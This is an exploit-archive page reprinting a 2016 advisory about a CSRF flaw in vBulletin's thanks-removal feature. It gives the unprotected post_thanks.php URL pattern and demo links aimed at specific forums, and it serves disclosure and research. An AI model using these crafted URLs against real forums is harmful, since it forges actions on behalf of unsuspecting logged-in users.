Vbulletin forums delete thanks CSRF (All versions)

CVE	Category	Price	Severity

Author	Risk	Exploitation Type	Date

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2016080239

Below is a copy:

Vbulletin forums delete thanks CSRF (All versions)########################################################
# Exploit Title: Vbulletin forums delete thanks CSRF (All versions)
# Date : 2016/08/22
# Exploit Author: Ashiyane Digital Security Team
# Vendor Homepage: https://www.vbulletin.com/
# Tested on: [Win 7/Firefox]
# Version : All versions
# Date : 27/08/2016
########################################################
#
# Location : http://localhost/forums/post_thanks.php?do=post_thanks_remove_user&p=[POST_ID]
#
########################################################
# Demo 1 :
#
# for this: http://ashiyane.org/forums/showthread.php?13217-Target-Trainings&p=985835&viewfull=1#post985835
#http://ashiyXane.org/forums/post_thanks.php?do=post_thanks_remove_user&p=985835
#
#for this: http://forums.irsXecteam.org/showthread.php?t=4686&p=5307&viewfull=1#post5307
#http://forums.irsXecteam.org/post_thanks.php?do=post_thanks_remove_user&p=5307
########################################################
# Description :
#
#When you want to add a thanks a parameter called securitytoken but in thanks_remove the parameter token will not be sent
#This problem is caused CSRF bug
########################################################
# discovered by : MALWaRE43
########################################################

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum